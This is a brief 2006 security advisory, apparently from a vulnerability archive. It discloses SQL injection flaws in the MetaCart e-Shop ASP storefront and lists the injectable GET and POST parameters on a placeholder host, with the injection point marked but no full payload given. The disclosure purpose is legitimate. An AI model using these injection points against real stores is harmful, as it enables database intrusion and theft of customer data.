Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15099
HistoryNov 16, 2006 - 12:00 a.m.

MetaCart e-Shop [multiples injection sql (get & post)]

2006-11-1600:00:00
vulners.com
43

vendor site:http://metalinks.com/
product:MetaCart e-Shop
bug:injection sql
risk:medium

injection sql (get) :
http://site.com/metacart/productsByCategory.asp?intCatalogID='[sql]
http://site.com/metacart/product.asp?intProdID='[sql]
injection sql(post) :

1 )http://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText='[sql]

2)http://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice='[sql]

3)http://site.com/metacart/searchAction.asp
variables :
/metacart/searchAction.asp?chkText=yes&strText=1&chkPrice=yes&chkCat=yes&sub
mit1=Submit&intPrice=all&strCat='[sql]

laurent gaffie & benjamin mosse
http://s-a-p.ca/
contact: [email protected]